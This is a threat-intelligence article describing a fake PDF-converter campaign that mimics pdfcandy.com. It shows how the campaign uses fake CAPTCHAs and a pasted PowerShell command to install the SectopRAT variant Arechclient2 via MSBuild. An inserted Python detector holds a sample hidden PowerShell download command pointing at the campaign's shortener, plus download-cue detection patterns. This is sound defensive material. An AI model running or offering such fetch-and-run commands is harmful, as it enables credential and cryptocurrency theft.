A highly targeted malware campaign is exploiting users’ trust in online file conversion services by mimicking the legitimate platform pdfcandy.com. The attack utilizes fake PDF-to-DOCX converters designed to deceive victims into running a malicious PowerShell script, which installs Arechclient2, a variant of the SectopRAT infostealer. This malware is engineered to extract sensitive data such as browser credentials and cryptocurrency wallet contents.
To enhance credibility and manipulate user behavior, the attackers employ convincing tactics including fake file processing animations, counterfeit CAPTCHA prompts and subtle psychological cues. The delivery mechanism is further obscured by a multi-layered redirection chain that ultimately downloads a malicious archive named adobe.zip, hiding the true nature of the threat.
Millions rely on online PDF converters for fast and convenient file format changes—but these free tools can come with hidden dangers. Just last month, the FBI issued a warning about cybercriminals exploiting these services to distribute malware.
Soon after, cybersecurity company CloudSEK exposed a sophisticated scheme involving a fraudulent PDF-to-DOCX converter. The fake tool mimicked the legitimate site pdfcandy.com, tricking users into engaging with malicious software.
Sophisticated Social Engineering Techniques:
The malicious websites deploy a layered social engineering approach to deceive users. After a file is uploaded, a fake processing animation mimics a real conversion process, instilling a false sense of trust. This is quickly followed by a sudden CAPTCHA challenge, designed to imitate standard security protocols and reinforce legitimacy. The prompt creates a sense of urgency, encouraging users to act hastily without questioning the website’s authenticity. This manipulation taps into familiar online behaviors, lowering users’ guard and paving the way for malware installation.
PowerShell Command as a Delivery Mechanism:
Once the CAPTCHA is completed, the site instructs users to run a PowerShell command, accompanied by step-by-step instructions to encourage execution. This marks the shift from psychological manipulation to direct system compromise. The command appears harmless to non-technical users, leveraging the site’s professional design to inspire confidence. Critically, this command initiates the download and launch of the malware, circumventing conventional security tools that rely on detecting suspicious files or user hesitation.
Obfuscated Redirection Chain for Malware Deployment:
Executing the PowerShell command sets off a complex redirection chain meant to mask the delivery of the malicious payload. It begins with a request to bind-new-connect[.]click/santa/bee, masked by a shortened link (https[://]bitly[.]cx[/]SMma). This link redirects to https[://]bitly[.]cx[/]Www0 and finally to bind-new-connect[.]click/marmaris/later, which serves the payload archive, adobe.zip. The payload is hosted on IP 172[.]86[.]115[.]43, a server already flagged as malicious by VirusTotal. The layered redirection makes tracing and detection significantly more difficult, highlighting the attackers' technical sophistication.
Payload Structure and Execution Strategy:
The downloaded archive, adobe.zip, extracts a folder named SoundBAND containing the executable audiobit[.]exe. When launched, this executable spawns cmd[.]exe, which in turn invokes MSBuild[.]exe—a legitimate Windows tool. The attackers exploit MSBuild as a “living-off-the-land” binary (LotL), using it to load Arechclient2, a .NET-based variant of SectopRAT active since 2019. According to ThreatFox, this malware specializes in stealing browser credentials, cryptocurrency wallets and other confidential data. By embedding the payload within trusted system processes, the attackers effectively evade standard antivirus detection mechanisms.
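The two detectable stages described above (the pasted PowerShell download command, and the audiobit.exe -> cmd.exe -> MSBuild.exe chain) can be expressed as process-creation logic. The following is an added example, not code from the article or from CloudSEK; it runs over constructed Sysmon-style records, and the allow-list of development parents, the paths and the PIDs are assumptions.

```python
# Added example, not code from the article or CloudSEK: a small detector over
# constructed Sysmon-style process-creation records. It flags (1) PowerShell
# launched from a shell that reaches out to a URL, as a pasted command would, and
# (2) MSBuild.exe reached via cmd.exe from a non-development ancestor, matching
# the audiobit.exe -> cmd.exe -> MSBuild.exe chain. Paths, PIDs and names are constructed.
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")  # one process-creation record

SHELLS = {"explorer.exe", "cmd.exe", "powershell.exe"}
DEV_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe"}   # assumed allow-list; tune per estate
SHORTENERS = ("bitly.cx",)                                   # shortener used in the article's chain
DOWNLOAD_CUES = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, process chain) tuples for every suspicious record."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img, cl = basename(e.image), e.cmdline.lower()
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else "<unknown>"
        # Stage 1: "run this command" social engineering -> PowerShell from a shell fetching a URL
        if img in ("powershell.exe", "pwsh.exe") and pimg in SHELLS and "http" in cl:
            if any(s in cl for s in SHORTENERS) or any(c in cl for c in DOWNLOAD_CUES):
                findings.append(("powershell_url_fetch_from_shell", f"{pimg} -> {img}"))
        # Stage 2: MSBuild as a living-off-the-land binary, launched through cmd.exe
        if img == "msbuild.exe" and pimg == "cmd.exe":
            grand = by_pid.get(parent.ppid)
            gimg = basename(grand.image) if grand else "<unknown>"
            if gimg not in DEV_PARENTS:
                findings.append(("msbuild_lotl_chain", f"{gimg} -> {pimg} -> {img}"))
    return findings

# Constructed telemetry: the article's chain (PIDs 100-500) and a benign developer build (600-800).
SAMPLE = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden Invoke-WebRequest https://bitly.cx/SMma"),
    ProcEvent(300, 200, r"C:\Users\victim\Downloads\SoundBAND\audiobit.exe", "audiobit.exe"),
    ProcEvent(400, 300, r"C:\Windows\System32\cmd.exe", "cmd.exe /c build.bat"),
    ProcEvent(500, 400, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe t.xml"),
    ProcEvent(600, 1, r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "devenv.exe"),
    ProcEvent(700, 600, r"C:\Windows\System32\cmd.exe", "cmd.exe /c build.bat"),
    ProcEvent(800, 700, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe app.csproj"),
]
```

Calling detect(SAMPLE) reports the PowerShell fetch and the audiobit.exe chain while the developer's own MSBuild run stays silent; in production the same logic would read Sysmon Event ID 1 (or EDR equivalents) rather than the embedded list.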
SectopRAT’s Delivery Tactics and Threat Capabilities:
SectopRAT leverages a variety of distribution techniques to broaden its reach, including malvertising through Google Ads and deceptive software update prompts. One prominent domain, bind-new-connect[.]click, has been identified as a key distributor, specifically involved in delivering the ArechClient variant. This malware is equipped with powerful functionalities such as keystroke logging, screen capturing and data exfiltration, posing a serious security risk. Its continued evolution and adaptability demonstrate the attackers’ ability to refine their methods in response to modern defense strategies.
Multi-Stage Attack Chain and Persistence Mechanisms:
The attack follows a structured, multi-phase chain—starting with social engineering, transitioning to the delivery of the malicious payload and ending with the execution of the malware. Once deployed, Arechclient2 establishes persistence on the victim’s system, enabling ongoing data theft. A detailed execution report from ANY.RUN illustrates the full chain of events, revealing how audiobit[.]exe coordinates the attack. The adversaries’ use of legitimate system utilities like MSBuild, combined with heavily obfuscated redirection paths, complicates incident analysis and detection—demanding advanced tools and techniques for effective threat mitigation.
Conclusion:
This investigation reveals how threat actors are exploiting the widespread use of online file converters to deliver sophisticated malware. By mimicking trusted platforms and using layered social engineering tactics, attackers manipulate users into executing malicious PowerShell commands. The campaign’s use of complex redirection chains and legitimate system tools like MSBuild helps it evade detection. As such threats grow more advanced, users and organizations must exercise caution and prioritize cybersecurity awareness when interacting with online services.
This campaign poses a significant threat to both individuals and organizations by enabling the theft of sensitive data such as browser credentials and cryptocurrency wallets. Its ability to bypass traditional security measures using legitimate system tools makes detection and response challenging. If widespread, such attacks could lead to financial losses, identity theft and long-term system compromise.